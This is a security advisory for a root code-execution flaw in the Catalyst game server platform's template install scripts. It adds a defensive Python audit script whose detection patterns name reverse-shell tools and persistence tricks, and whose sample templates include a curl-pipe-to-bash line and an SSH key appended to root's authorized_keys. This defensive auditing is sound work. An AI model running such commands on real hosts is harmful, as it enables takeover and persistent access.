CVE-2026-26009

Catalyst · Catalyst Game Server Platform

Catalyst allows users with template permissions to execute arbitrary shell commands as root on host operating systems due to a lack of sandboxing in server template install scripts.

Executive summary

The Catalyst platform is subject to a critical remote code execution vulnerability where authenticated users can gain full root-level access to all nodes in a cluster.

Vulnerability

The vulnerability lies in how install scripts in server templates are handled: they are executed directly on the host via bash -c without sandboxing. This allows an authenticated attacker with template.create or template.update permissions to achieve root-level remote code execution.

Business impact

The impact is catastrophic, as an attacker can gain total control over every node machine within the Catalyst cluster. This could lead to the theft of sensitive billing data, destruction of game community assets, and complete infrastructure takeover. The CVSS score of 9.9 underscores the extreme risk posed by this lack of isolation.

Remediation

Immediate Action: Apply the security fix identified in commit 11980aaf3f46315b02777f325ba02c56b110165d or update to the latest version.

Proactive Monitoring: Audit all existing server templates for suspicious shell commands and monitor node operating systems for unauthorized root-level activity.

Compensating Controls: Restrict template.create and template.update permissions to only the most trusted administrative personnel until the patch is applied.
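
An added example, not part of the advisory or the Catalyst code base: a triage pass for the template audit and permission review described above. It assumes templates and role assignments have been exported into Python dictionaries; the field names name and install_script, the server.view permission, the indicator patterns and all sample data are constructed for illustration.

```python
import re

# Heuristic indicators, constructed for this example; tune them to your environment.
INDICATORS = {
    "download piped to shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z|da)?sh\b"),
    "decode piped to shell": re.compile(r"\bbase64\b[^\n|]*\|\s*(ba|z|da)?sh\b"),
    "account or sudoers change": re.compile(
        r"\b(useradd|usermod|adduser|chpasswd|visudo)\b|/etc/(passwd|shadow|sudoers)"),
    "ssh key persistence": re.compile(r"authorized_keys"),
    "scheduled task persistence": re.compile(r"\bcrontab\b|/etc/cron|systemctl\s+enable"),
    "raw network socket": re.compile(r"/dev/tcp/|\b(nc|ncat|socat)\b"),
}
# Permission names taken from the advisory.
RISKY_PERMS = {"template.create", "template.update"}

def audit_templates(templates):
    """Return {template name: [indicator labels]} for install scripts needing review."""
    findings = {}
    for tpl in templates:
        script = tpl.get("install_script") or ""
        hits = [label for label, rx in INDICATORS.items() if rx.search(script)]
        if hits:
            findings[tpl["name"]] = hits
    return findings

def risky_principals(role_assignments):
    """Return the sorted users who can create or update templates."""
    return sorted(u for u, perms in role_assignments.items() if RISKY_PERMS & set(perms))

# Constructed sample export (hypothetical field names and values).
SAMPLE_TEMPLATES = [
    {"name": "minecraft-paper", "install_script":
        "mkdir -p server\ncurl -fsSL -o server/paper.jar https://downloads.example.invalid/paper.jar\n"},
    {"name": "custom-mod", "install_script":
        "curl -s https://files.example.invalid/setup.sh | bash\n"},
    {"name": "legacy", "install_script":
        "echo 'ssh-ed25519 CONSTRUCTED-PLACEHOLDER' >> /root/.ssh/authorized_keys\n"},
]
SAMPLE_ROLES = {
    "alice": ["server.view", "template.update"],
    "bob": ["server.view"],
    "carol": ["template.create", "template.update"],
}

if __name__ == "__main__":
    for name, hits in audit_templates(SAMPLE_TEMPLATES).items():
        print(f"REVIEW template {name}: {', '.join(hits)}")
    print("Template write access:", ", ".join(risky_principals(SAMPLE_ROLES)))
```

A template with no matches is not thereby clean: before the fix every command in an install script ran as root on the host, so use the output to prioritise manual review rather than to clear templates.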

Exploitation status

Public Exploit Available: false

Analyst recommendation

The absence of containerization for administrative scripts represents a fundamental security failure. It is imperative that administrators update their Catalyst installations immediately. Furthermore, organizations should adopt a principle of least privilege for all template-related permissions to minimize the internal attack surface.